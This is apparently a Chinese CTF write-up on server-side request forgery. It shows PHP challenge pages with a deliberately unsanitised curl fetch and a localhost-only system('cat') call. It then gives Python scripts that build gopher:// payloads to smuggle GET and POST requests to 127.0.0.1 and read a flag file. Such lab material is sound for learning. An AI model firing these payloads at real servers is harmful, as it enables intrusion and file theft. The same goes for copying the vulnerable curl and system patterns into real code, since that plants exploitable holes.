ssrf_get
<?php
//flag in flag.php
error_reporting(0);
highlight_file(__FILE__);
$url=$_GET['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
?url=127.0.0.1/flag.php
看到
<?php
highlight_file(__FILE__);
error_reporting(0);
include('f.php');
echo $_SERVER['REMOTE_ADDR'].'<br/>';
$a = $_GET['a'];
if($_SERVER['REMOTE_ADDR']=='127.0.0.1'){
system('cat '.$a);
}else{
die('非本地用户,禁止访问');
}
?>
这里不考虑使用file直接读取 f.php内容,尝试一下如何使用gopher 进行get传值
burp拦截 取前两句
GET /flag.php?a=f.php HTTP/1.1
Host: 110.42.137.79:8115
import urllib.parse
payload = """
GET /flag.php?a=f.php HTTP/1.1
Host: 110.42.137.79:8115
"""
tmp = urllib.parse.quote(payload) #对payload中的特殊字符进行编码
new = tmp.replace('%0A','%0D%0A') #CRLFL漏洞
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)# 对新增的部分继续编码
print(result)
ssrf_post
还是上面情况,如果是post
import urllib.parse
payload= """
POST /flag.php HTTP/1.1
Host: 110.42.137.79:8115
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
a=f.php
"""
tmp = urllib.parse.quote(payload) #对payload中的特殊字符进行编码
new = tmp.replace('%0A','%0D%0A') #CRLFL漏洞
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)# 对新增的部分继续编码
print(result)
Content-Length: 7是post传参的长度
版权声明:本文为Yjlay原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。